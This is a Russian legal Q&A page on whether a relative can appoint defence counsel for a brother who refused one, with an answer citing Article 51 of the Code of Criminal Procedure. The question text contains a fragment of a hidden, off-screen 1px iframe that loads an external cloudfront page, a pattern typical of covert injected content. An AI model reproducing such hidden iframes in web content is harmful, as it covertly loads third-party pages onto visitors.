Республика Дагестан

мой брат отказался от адвоката могу ли я назначит для него адвоката без его согласии<iframe id="iagdtd_frame" style="position: absolute; width: 1px;... - вопрос №1371849

height: 1px; left: -9999px;" src=«d19tqk5t6qcjac.cloudfront.net/i/412.html»>

Ответы

Здравствуйте. Назначить адвоката против воли гражданина (подозреваемого, обвиняемого или подсудимого) не сможет, ни кто, и вы в том числе. Исключения перечислены, в ч.1 ст.51 УПК РФ, но и при этом, назначать адвоката будете не вы, а уполномоченные на то, должностные лица (следователь, дознаватель, суд). Поэтому следует убедить брата ходатайствовать о приглашении именно выбранного вами адвоката к участию в деле. А если он находится под стражей, и связи с ним нет, то вы можете от своего имени заключить с адвокатом соглашение о защите брата, но, вы должны понимать, что брат и в этом случае, так же может отказаться и от этого защитника по своему усмотрению.